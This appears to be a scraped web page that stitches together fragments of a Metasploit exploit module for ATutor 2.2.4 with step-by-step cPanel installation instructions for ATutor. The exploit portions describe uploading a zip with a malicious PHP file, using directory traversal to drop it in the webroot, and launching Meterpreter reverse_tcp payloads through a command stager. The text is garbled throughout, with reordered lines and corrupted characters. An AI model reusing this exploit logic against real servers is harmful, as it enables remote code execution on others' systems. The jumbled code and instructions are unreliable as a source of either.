Print_status("Executing payload via = 'linux'Įxecute_cmdstager(background: true, flavor: temp: './')Įxecute_cmdstager(background: true, flavor: The only way to know whether or not the exploit succeeded, is by checking if a session was created If that fails, it tries to exploit `Patcher` # The module first attempts to exploit `Import New Language`. # There are two vulnerable functions, the `Import New Language` function and the `Patcher` function # NOTE: Automatic check is implemented by the AutoCheck mixin Print_good("Identified the target OS as #) When 'CentOS', 'Debian', 'Fedora', 'Ubuntu', = targetsįail_with(Failure::NoTarget, 'No valid target for target OS') zip file: The extracted files will be located in a folder. Target_os = ('(').split(')')įail_with(Failure::NoTarget, 'Unable to determine target OS') unless target_os Download the package for ATutor from the ATutor: site: Upload the downloaded file to the publichtml folder using the File Manager in cPanel: Next extract the. # Apache probably supports more OS keys, which can be added to the array # By default, the Apache server header reveals the target OS using one of the strings used as keys in the hash below # The ATutor documentation recommends installing it on a XAMPP server. Print_warning('Could not detect target OS.') 'WfsDelay' => 3 # If exploitation via `Import New Language` doesn't work, wait this long before attempting exploiting via `Patcher` 'PAYLOAD' => 'windows/圆4/meterpreter/reverse_tcp' 'PAYLOAD' => 'linux/圆4/meterpreter/reverse_tcp'
#Atutor zip windows 10
Has been successfully tested against ATutor 2.2.4 running on Windows 10 Valid credentials for an ATutor admin account are required.
#Atutor zip archive
Zip archive and attempts exploitation via `Patcher`. If no session is obtained, the module creates another The moduleįirst uploads the archive via `Import New Language` and then attempts toĮxecute the payload via an HTTP GET request to the PHP file in the root `Import New Language` function and the `Patcher` function. The zip archive can be uploaded via two vectors, the The PHP file contains anĮncoded payload that allows for remote command execution on the The zipĪrchive takes advantage of a directory traversal vulnerability that willĬause the PHP file to be dropped in the root server directory (`htdocs`įor Windows and `html` for Linux targets). It first creates a zip archive containing a malicious PHP file. This module exploits an arbitrary file upload vulnerability together withĪ directory traversal flaw in ATutor versions 2.2.4, 2.2.2 and 2.2.1 in
#Atutor zip code
Congratulations on your freshly installed ATutor.Class MetasploitModule 'ATutor 2.2.4 - Directory Traversal / Remote Code Execution, ', – The wizard will then save the configuration and will automatically load the admin login screen: Once the folder is created, fill in its path: – You will then need to create a “content” folder and assign it permisions 777. – The wizard will than show the tables created in thye database: – Next, you will have to fill in the database details:
#Atutor zip license
– Then you will be presented with the License agreement: – On the next screen, it will verify that the server configuration will allow the installation: You will get the start page for the installation wizard: Those will be needed during the installation process: Write down the database name, username and password. – Now go to cPanel > MySQL Database Wizard and create the database to be used by the application. Go into it, select all files and use the Move function to relocate them straight into the public_html folder:
– The extracted files will be located in a folder. – Upload the downloaded file to the public_html folder using the File Manager in cPanel: – Download the package for ATutor from the ATutor: site: (NOTE PHP 5.4+ is not supported in ATutor versions prior to 2.1.1.) PHP 5.0.2+ with the following libraries installed.